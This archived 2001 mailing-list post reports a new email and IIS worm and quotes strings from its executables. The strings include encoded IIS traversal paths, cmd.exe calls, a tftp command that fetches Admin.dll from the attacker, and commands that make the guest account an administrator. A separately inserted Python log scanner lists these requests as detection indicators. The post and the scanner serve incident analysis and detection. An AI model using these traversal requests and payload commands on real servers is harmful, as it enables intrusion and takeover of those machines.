( sorry for the cross-post, this might have interest for both lists )

Hello all,

Today I've received two apparent distinct strange incidents. One sequence of strange mails with executable attachments and a large number of hits on my IDS regarding attempts to exploit known security problems within Microsoft IIS.

At a first glance, I did not understand that those two incidents were related, until I did a "strings *.exe" to figure out what the hell was that.

What I could find out is that this is ( at least for me ), a new virus/worm/whatever that uses SMTP ( exploiting known vulnerabilities within Microsoft Outlook ) and many also known vulnerabilities within Microsoft IIS.

Here are some of its content:

<quote>
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
....
NUL=
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
...
software\microsoft\windows nt\currentversion\perflib
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
html
script language="JavaScript"
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
script
html
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
...
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
....
</quote>

I kept the executables for analysis, if anyone would like to take a look, drop me an email.

So, what I ask is, does anyone know about this worm? I've done a quick search for it and couldn't find anything like it.

Best regards,

Joao Gouveia
-------------
jgouveiaat_private

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
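One way to pick the IIS requests from the strings dump above out of a web-server access log, as an added example that is not part of the original post. The indicator list is taken from the quoted strings; the log lines are constructed samples, and the assumption that the request path is the first space-separated field starting with "/" (IIS W3C layout) is noted in the code.

```python
"""Scan access-log lines for the encoded IIS traversal and dropper
requests quoted in the post. Added example; sample log is constructed."""
from urllib.parse import unquote

# Encoded traversal fragments and file names copied from the strings dump.
INDICATORS = (
    "..%255c..", "..%c1%1c..", "..%c0%2f..", "..%c0%af..", "..%c1%9c..",
    "..%%35%63..", "..%%35c..", "..%25%35%63..", "..%252f..",
    "/root.exe", "cmd.exe?/c+", "admin.dll", "readme.eml",
)


def decoded_traversal(uri):
    """True if percent-decoding once or twice exposes a '../' or '..\\'
    step; catches the double-encoded %252f / %255c family generically."""
    once = unquote(uri, errors="replace")
    twice = unquote(once, errors="replace")
    return any(t in s for s in (once, twice) for t in ("../", "..\\"))


def classify_request(uri):
    """Return the indicators that fire on one request path (empty = clean)."""
    low = uri.lower()
    hits = [i for i in INDICATORS if i in low]
    if decoded_traversal(low):
        hits.append("decoded-traversal")
    return hits


def scan_log(lines):
    """Return (line_no, uri, hits) for each suspicious request. Assumes the
    request path is the first whitespace-separated field beginning with '/'
    (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status)."""
    findings = []
    for no, line in enumerate(lines, 1):
        uri = next((f for f in line.split() if f.startswith("/")), "")
        hits = classify_request(uri)
        if hits:
            findings.append((no, uri, hits))
    return findings


SAMPLE_LOG = [  # constructed lines modelled on the requests in the post
    "2001-09-18 10:53:04 10.0.0.5 GET /index.asp - 200",
    "2001-09-18 10:53:05 10.0.0.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 404",
    "2001-09-18 10:53:06 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp+-i+10.0.0.9+GET+Admin.dll 404",
    "2001-09-18 10:53:07 10.0.0.9 GET /scripts/root.exe /c+dir 404",
    "2001-09-18 10:53:08 10.0.0.12 GET /images/logo.gif - 200",
]

if __name__ == "__main__":
    for no, uri, hits in scan_log(SAMPLE_LOG):
        print(f"line {no}: {uri} -> {', '.join(hits)}")
```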
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:53:04 PDT